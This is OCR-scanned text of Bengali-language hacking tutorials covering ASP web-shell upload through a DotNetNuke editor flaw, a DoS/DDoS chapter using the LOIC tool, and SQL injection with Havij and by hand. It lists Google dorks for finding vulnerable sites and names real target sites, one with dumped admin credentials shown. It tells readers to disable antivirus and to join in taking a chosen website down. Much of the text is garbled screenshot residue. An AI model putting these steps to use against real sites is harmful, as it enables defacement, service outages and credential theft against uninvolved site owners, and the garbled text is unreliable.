edituser.asp 7 
edituser save.asp 5 Kbytes 
fabu.asp 8 Kbytes 
fabu Save.asp 5 Kbytes 
falsh.swf 

favicon.ico 

float js 

Foot asp 

Gbook asp 

GetCode.asp 

GetPayHandle asp 

GetPayNotify.asp 5 Kbytes 
haiyang2 db 201104200200.BAK 7,114 Kbytes 
Head.asp 3 Kbytes 
Headt.asp 3 Kbytes 
hyfabu.asp 14 Kbytes 
hyfabu save.asp 

Index.asp 13 Kbytes 
ip.asp 1 Kbytes 
listad.asp 6 Kbytes 
Login.asp 

lostpass.asp 

md32 asp 

md5.asp 

message.asp 6 Kbytes 
money.asp 14 Kbytes 
nc_selcolor.him 

News.asp 
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এবার আপনারা deface html ফাইলটি ওপেন করুন। 


এবার এটার উপর রাইট বাটন ক্লিক করে open with notepad এ ক্লিক করুন। 


Open 
Open in Same Win: 


powennlühtm print 


Scan with ESET NO 


Advanced options 


ie. Pictures 


Internet Explorer 


Notepad 
3, Homegroup rar” and email 


Choose default program. 
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File Edit Format View 
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9 ॥ Rock's ASP SHELL... ::. - Mozilla Firefox 4.0 Beta 2 
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Save complete 


Blog.asp 
Blog_Dp.asp 
Blog_Fk.asp 
Blog_Head.asp 
Blog Headstr.asp 
Blog Poto.asj 
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ক্যামিক হ্যাকিং অধ্যায়-১০ 
DNN (Dot Net Nuke) সাথে ভিডিও ওয়েবসাইট হ্যাকিং 


DNN f ?DNN হল মাইক্রোসফট এর এসপি (ASP) প্রোগ্রামিং ল্যাংগুয়েজ এর একটা বাগ (88). এর সম্পূর্ন 
নামঃ Dot Net Nukel এর মাধ্যমে আমরা ফাইল/শেল আপলোড করতে পারব | যে কোন সাইট কি হ্যাক করা 
যাবে ? না, যে সকল সাইট এই Vulnerable সে সকল সাইট হ্যাক করা MAI অনেক সাইট এ Hackable.s| কি 
ভাবে পাব Vulnerable সাইট? মামু আছে না! মামু থাকতে চিন্তা নাই। আমি কয়েকটা کت‎ দিচ্ছি যা দিয়ে সহজেই 
Vulnerable সাইট বের করতে পারবেন। 


inurl:/portals/Oinurl:Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxinurl:”Fck/fcklinkgallery.aspx” 
গুগলে এটি লিখে সার্চ দিলে অনেক Vulnerable ওয়েবসাইট পেয়ে যাবে তার থেকে যেকোন একটি বেছে নাও। 


inuri-"/Providers/HtmlEditorProviders/F ck/fcklinkgallery.aspx" 


۱۱ এখন রেজাল্ট এর একটা সাইটএ ক্লিক করুন আপনি এইরকম দেখতে পাবেন ছবি 


৩. File (A File On Your Site) লিখা রেডিও বাটনে ক্লিক করো | 


ছবি 


Link Type: 


URL ( A Link To An External Resource ) 
Page ( A Page On Your Site) 
9 File ( A File On Your Site) 
File Location: 
Root 


File Name: 
0.0 


i$ Blue Fox Billiards | Billiards | Bar | Grill > bil == 


javascript: doPostBack( ctlURLScmdUpload 


Link Type: 
URL ( ALink To An External Resource ) 
Page ( A Page On Your Site ) 


9 File ( A File On Your Site ) 


৫. Script রান করালে ফাইল Upload করার জন্য চিত্রের মত Browse বাটনটি MAR 


Link Type: 
URL ( A Link To An External Resource) 
Page (A Page On Your Site ) 
9 File ( A File On Your Site ) 
File Location: 


Root S 


File Name: 


Browse 


৬.এখানে Browse করে Jpg,Gif,swf ইত্যাদি ফাইল Upload করতে NAA! এখানে যাই Upload করবে তা 
সাধারন ভাবে /portals/0/ তে Upload AAI যদি তোমার সাইটের নাম হয় target.net এবং তোমার Upload করা 
ফাইল এর নাম যদি হয় testswf তাহলে তোমার ফাইল পাবে http://www.Target.net/portals/O/test.swf তে। 
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0005 কি ? Ddos sire কি কেন কিভাবে ? কিভাবে 
ব্যাসিক হ্যাকিং-১২ -Ddos কি ? Ddos আযাটাক কি কেন কিভাবে ? 

কিভাবে Ddos আযাটাক করব ? 

প্রথম প্রশ্ন DoS জিনিস টা কি ? DDoS এবং DoS কি একই জিনিস ? 


DoS এর পরিপূর্ণ রূপ হচ্ছে Denial of Service | DoS আযাটাক এ একটা পিসি অথবাএকটা ইন্টারনেট কানেকশন | 
আযাটাকার ] থেকে একটা নির্দিষ্ট সার্ভার [ভিকটিম ] এ অনবরত [ FE ] TCP/UDP প্যাকেট পাঠানো হয় | 
এতে করে ওই নিৰ্দিষ্ট সার্ভার এর ব্যান্ডউইথ এবং অন্যান্য সবকিছু ওভারলোড হয়েযায় | ফলাফল ? এর পর যেই 
ওই সার্ভার এ কানেকশন করার চেষ্টা করবে , তাকেই সার্ভার সার্ভিস দেওয়া থেকে বিরত থাকবে ! 

অর্থাৎ সোজাসুজি Denial of Service হবে সার্ভার থেকে | 


এবার DDoS | এটার পূর্ণ রূপ হচ্ছে Distributed Denial of Service | ব্যাপার টা এভাবে চিন্তা করুন ... আপনি 
রাস্তা দিয়ে হেটে যাচ্ছেন হঠাৎ করে আপনাকেএকজন ছিনতাইকারী আক্রমন করলো | 

এখন আপনি যদি গায়ে গতরে তার থেকে একটু শক্তিশালী হয়ে থাকেন এবং ভাগ্য খানিক টা সুপ্ৰসন্ন হয়ে থাকলে 
আপনি উলটোওই ছিনতাইকারী কে পিটিয়ে তক্তা বানিয়ে দিয়ে পারেন | 

কিন্ত যদি আপনাকে ১ জনের জায়গা তে ১০ -১২ জন আক্রমন করে ? 

১৫ দিন পর হাসপাতাল থেকে ছাড়া পাবেন ঠিক এরকম ব্যাপার ই হচ্ছে DDoS | 

DoS এর মত করেই কাজ করে কিন্তু DDOS এ অনেক বেশী আ্যাটাকার একসাথে কাজ করে | ফলাফল ভয়াবহ | 


আমার কথাবার্তা কি একটু SEL লাগছে ?:S এতখন যা বললাম তা কি দুর্বোধ্য লাগছে ? তাহলে নিচের Basen 
দেখুন বুঝে জাবেন কিভাবে DoS এবং DDoS কিভাবেকাজ করে | 


একটা সাধারণ কানেকশন কাজ করে এই ভাবে নিচের চিত্রের মত করে 


fèw DoS আযাটাক টা হচ্ছে নিচের মত 


আর DDoS আ্যাটাক হচ্ছে নিচের চিত্রের মত 


! ۱ ۱ ۱ ۱ ॥ 
D e e e p 
এটি 


t 
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THE HOSTING 
[ leTCRAFT TT INDUSTRY'S FIRST SEE WHY 
BILL OF RIGHTS CUSTOMER BILL IT'S BETTER 


7 OF RIGHTS 
What at site running Search 12 বক্সে [c খুন 4 & 


Netcraft Services ICO এবং Search 


internet Exploration 


Internet Data Mining 


Uptime for www.demon.net 
Note: Uptime - the time since last reboot Generated on 7-May-2009 


Performance 
uuu, denon, net 


Whats that site running ?emmmmbshèmmmpmsme Search | 


OS, Web Server and Hosting History for 


iini was running Apache on Linux when last queried at 31-Mar-2012 13:52:5 
এটা লক্ষ করুন 


Last changed IP address 


লক্ষ্যকরুন Apache/1.3.27 (Unix) লেখা টি | এটা ওই নির্দিষ্ট সাইট এর সার্ভার ।এখানে যদি নিচের ৩ টার 
যেকোনো একটা দেখেন তাহলে বুঝবেন যে এই সাইট এ ডসমজ্যাটাক করে ফলাফল পাওয়া সম্ভব | 


Apache 1.x 
Apache 2.x 
GoAhead WebServer 


THBHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHE 
এবার শুরু হয়ে যান আসল খেলার জন্য DoS কি ? DoS আ্যাটাক fè কেন কিভাবে ? 


সফটওয়্যারটি ডাউনলোড বা এটি নিয়ে কাজ করার আগে আপনার পিসির এন্টিভাইরাসের প্রোটেকশন অফ ۱ 
এটিকে আপনার এন্টি ভাইরাস ট্রোজান বা ভাইরাস হিসাবে fòt করতে পারে তবে ভয় নাই, এটি কোন ভাইরাস 
বা ট্রোজান নয়, নির্ভয়ে ইউজ করুন। 


সফটওয়্যারটি প্রথমে নিচের লিঙ্ক থেকে ডাউনলোড করে নিন এবং Extract করুন। 


http://www.mediafire.com/?famiivi799a9459 


সফটওয়্যারটিডাবল ক্লিক করে ওপেন করুন। যাদের উইন্ডোজ ৭ তারা ফাইলে রাইট ক্লিক করে Run as 
administrator এ ক্লিক করে ওপেন করুন। নিচের মত উইন্ডো BNE! 


Er 


HTTP Subsâe 
Li 


10 EJ wot tor reply 


[1 Select your target — — — — — — —— 
| URL 18505519058] 


TCP / UDP message 
Å cat & fine too. Desudesudesu- 


Praetox:com 


১. URL TH যে কোন সাইটের নাম Ges Sall 


(সবাই মিলে একটি সাইট সিলেক্ট করতে হবে, সিঙ্গেল এটাকে সাইটের কিছুই হবে না। টপ সাইটের লিস্ট 
http://www.alexa.com/topsites/ ,এখান থেকে ۱ তাই সবাই মিলে একটি সাইট সিলেক্ট করুন, যেটিকে ডাউন করতে 
চান। ) 


r-1 Select your target T d 


| 
| URL hipJbbsfnici/| | Lock 


| Lock on 


NONE! 


10 BH wat tor reply 


২. "lock on" সিলেক্ট করুন। 


1. Select your target 
URL http Ibs. nic nl 


1 


TCP / UDP message 
Å cat & fine too. Desudesudesu- 


Praetox:com 


৩. দেখবেন আইপি লক হয়ে গিয়েছে | 


1. Select your target 2. Ready? 


URL hipbsfnicin/ | Lock on | 


e | Lock on | 


164.100.52.73 


TCP / UDP message 
Å cat 5 fine too. Desudesudesu- 


| IMMA CHARGIN MAH LAZER 


=, LL 


Praetox.com 


8. চিত্র এর মত করে "http" সিলেক্ট করুন। 


TCP / UDP message 
Å cat & fine too. Desudesudesu- 


Praetox:com 


164.100.52.73 


TCP / UDP message 
A cat is fine too. Desudesudesu- 


“= faster Speed slower -> 


t.Threads বক্স এ 1000 টাইপ করুন। 


TCP / UDP message 
A cats fine 100. Desudesudesu- 


PE GE 


৬. এবার "EMMA CHARGIN MAH LAZER" বাটনটি তে ক্লিক করুন। 


TCP / UDP message 
A cat fine too Desudesudesu- 


AAA AAA AA AAA A AAA 341 H EE EEEH HH HHH HERH HEHH EHH HHHH H 


Dos / DDoS এর থেকে বাঁচার উপায় কি ? 
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(Havii SGLi injection) GR হ্যাকিং 
5014 টিউটোরিয়াল vvv 


Download 
.Havij 1.5 Pro : http://www.mediafire.com/?s7a89dxmfwxcyij 


e প্ৰথমে Google Com এ MAI 
e এবার নিচের গুগল ডকটি লিখে সার্চ দিন। 


"inurl:php?id=" 


e তাহলে অনেকগুলো ফলাফল দেখাবে। 
e এখানে অনেক Dork পাবেন : http://pastebin.com/DvnHxg7i 


SGA চিত্র Maps অনুবাদ দস্তাবেজ গোষ্ঠীসমূহ Gmail 


IG "inurl:php?id=" 


* দেখুন ফলাফল দেখাচ্ছে “AA 2,010,000,000টি ফলাফল (0.23 সেকেন্ড) ” 

* এবার যে কোন একটি সাইটে প্রবেশ করুন। 

* এছাড়াও আপনি যে কোন সাইট ধরতে পারবেন, যে সব সাইটের পর php?id- আছে| সেই সব সাইটে পারবেন। 
যেমনঃ 


http://www.paulprescott.com/theme.php?id=10 


* আমরা এই সাইটটিকে টার্গেট করলাম। 


e এবার আপনার টার্গেট করা সাইটের লিংকের শেষে দেখেন এমন একটা আছে ID=XX, এখানে XX এর জায়গায় যেকোন 
নং আছে। যেমন আমার এখানে আছে 10510 

e এবারর এই লিংকের শেষে একটা (^) লাগান। 

* এবার এন্টার দিন। 


m paulprescott.com/theme,r 
€ C © paulprescottcom 


You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ۲ 


ORDER BY id ASC’ at line 1 


! egnalure b e Se Unsetected Ce 


erpi IST, CON 


* এবার যদি উপরের মতো Error দেখায়, তাহলে বুঝবেন যে, সাইটটিতে inject FAT যাবে। 
e এবার “Havij” টুলসটা ওপেন করুন। তাহলে নিচের মতো আসবে। 


http://paulprescott.com/theme.php?id=10'| 


star Syntax: 2 


Auto Detect w| Method: |GET ۱ Type: | Auto Det 


Post Data: 


http#/ITSec 
bitp://forum.Itse 


Check for update 


Register 
^ 


ys 
Settings 


http://paulprescott.com/theme.php?id=10' 


ste Syntax: 


Auto Detect wi Method |GET vi Type: | Auto Detet 


Post Data: 


© مس‎ [5] 1 
Info Tables Read Files she ۷ : / Settings 


Clear Log 


^ 


r?! [If injection failed, retry with a manual 


aulprescott.com/theme.php?id-10! 


a Analyze 
Syntax: E 


w! Method [GET el Ty F) ki 
= EEE a Load Save 


let, Read File She Query Find Admin MD5 Settings 


& 


4 1 
Save Tables Save Data 


| 4 


¥ Use Group Concat (MySQL Only) IV Allin one request 


If injection failed, retry with a manual ۷۷ 


http://paulprescott.com/theme.php?id-10! 
Analyze 
Keyword: ito Dete Syntax z 


Auto Detect sl Method |GET el Type: | Auto Detect e 


4 


Tables Read Files She Find Admin 109 


Get Tables Get Columns 


Group | 1 


Le 


http://paulprescott.com/theme.php?id=10' 


= Änalyze 
Syntax: Z 


| Auto Detect wi Method |GET ~| * | Auto Detect | C i 
` ——— — = Se 3 Load Save 


E 
Read Files 


( 


# Allin one request Force to use i 


If injection failed, retry with a manual keyword. 


und; information s 
ound: paul third 


ott.com/theme.php?id=10' 
Syntax: 


Method: l GET 


Li 
Tables Read Files 


Get DBs Get Tables Get Columns 


mation schema 
paul third 


://paulprescott.com/theme.php?id=10' | 
Analyze 
Syntax: d 
Auto Detect Method: |GET e: | Auto Detect v G wi 
d کے‎ — : "শা Load Sav 


j li 
Find Admin MD5 Settings 


4 ۱ 
Save Tables Save Data 


Group Concat (MySQL Only) ¥ Al in one reques Force to 


l'm IDLE 


rmation_schema 
Found: paul_thi 


http://paulprescott.com/theme.php?id=10" } 

Analyze 
Syntax: : 
Auto Detect Method GET  v|Type | Auto Detect e 


m |] 3 a 


Tables Read Files She Query 


Get Tables Get Columns \ Get Data Å 
+ Å 


e | id SSW... a ger på 


] ytube 


P, [Iv 1 t Force to use i 7۱ Clear list on get 


Clear Log 


ott.com/theme.php?id-10' } 11 
Analyze 
Syntax: z 


Method ۳ - TE, 1 
= = Load Save 


m EI | এ T YS 
Tables Read Files She 7 Find Admin MD5 Settings 


[Ff i? | | 


2. Get D . Get Tables Get Columns Get Data ve Tables Save Data 


STE. || 
(paul tit lig password username — email 
able i> 


password admin 


] psgallry 


[l ytube 


Group_Concat (MySQL Only) 


Status: I'm IDLE 


ame=admin 


^o RR 


http://paulprescott.com/theme.php?id=10'| 


Syntax: Å 


Database: Auto Detect >| Method kam 


Post Data; 


Settings 


Clear Log 


på YO 'tp://paulprescott.com/theme.php?id—10'| 
D NE ۹ Analyze 
৬১ : ec Syntax: o Detec d 


Jat "ee 055০১ | Method: |GET el Type: | Auto Detect ৮) j 
MEE - = تست‎ : ==="; bond Save 


Find Admin MD5 Settings 


Path to search: 7 ` ৬ 
9 Suc tes: 200,500,301,2 Web Ge 


Failture res: 4 i 404 Ha på 
Found Pages: 


| Page 


http://paulprescott.com/theme.php?id=10' 
Syn 


Auto Detect | Method |GET el Type: | Auto Detect e 


Path to search: 
5 


Failture res: 


'paulpresco copy contre 301 Moved Permanently 
| 


paulpresco om/cpanel l 301 Moved Permanently 


301 Moved Permanently | 


Clear Log 


TER লিখেছেন -37۳2 5 SAA" 


SQL injection Manual Live Hacking ওয়েবসাইট হ্যাকিং 


তাহলে কথা না বারিয়ে শুরু করি | 
প্রথমে SQL INJECT করার জন্য আমাদের ভার্নাবল সাইট খুজতে হবে। 
এর জন্য আমরা dork use করব ! 
inurl:index.php?id= 
inurl:trainers.php?id= 
inurl:buy.php?category= 
inurl:article.php?ID= 

inurl:play old.php?id= 
inurl:declaration more.php?decl id= 
inurl:Pageid- 

inurl:games.php?id= 
inurl:page.php?file— 
inurl:newsDetail.php?id— 
inurl:gallery.php?id— 


এই খানে কিছু dork আছে sql ভার্নাবল সাইট ASA জন্য | 
8500 SQL dorks list 

http://pastebin.com/dzknXjgP 

or 

http://pastebin.com/ayV6tNS2 


প্রথম এ একটা dork নিয়ে INA www. google.com এ SEARCH দিব | 


inurl:news-and-events.php?id= 


এই dork দিয়া SEARCH দিয়ে আমি অনেক সাইট দেখলাম সেখান থেকে আমি একটা সাইট নিলাম | 
যেমন : 
http://www.eastodissa.ac.in/news-and-events.php?id=22 


ছবিঃ 


e inurl:news-and-events.php?id- - Google Search - Mozilla Firefox 


googl 


+faroque Search Images Maps Play YouTube News Gmail Drive 
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